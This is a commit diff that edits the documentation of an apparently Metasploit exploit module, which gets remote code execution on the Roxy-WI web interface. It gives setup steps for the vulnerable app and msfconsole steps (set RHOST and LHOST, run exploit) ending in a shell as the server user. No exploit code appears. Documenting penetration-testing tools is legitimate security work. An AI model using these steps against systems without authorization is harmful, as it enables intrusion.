Apply suggestions from code review
Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
This commit is contained in:
@@ -10,7 +10,7 @@ Successful exploitation results in remote code execution under the context of th
|
||||
|
||||
Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
|
||||
|
||||
[https://roxy-wi.org/installation.py](https://roxy-wi.org/installation.py)
|
||||
https://roxy-wi.org/installation.py#manual
|
||||
|
||||
```
|
||||
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
|
||||
@@ -24,12 +24,11 @@ chown -R www-data:www-data haproxy-wi
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/linux/http/roxy_wi_exec`
|
||||
4. Set `RHOST`
|
||||
5. Set `LHOST`
|
||||
4. Set `RHOST` to the address of the target Roxy-WI machine.
|
||||
5. Set `LHOST` to the address of your attacking machine.
|
||||
8. Run `exploit`
|
||||
9. Do: `run`
|
||||
10. You should get a shell.
|
||||
11. **Verify** that you are getting meterpreter session.
|
||||
10. You should get a shell as the user running the Roxy-WI server.
|
||||
|
||||
## Options
|
||||
Set `TAGETURI` if the Roxy-WI is installed at a custom path.
|
||||
|
||||
Reference in New Issue
Block a user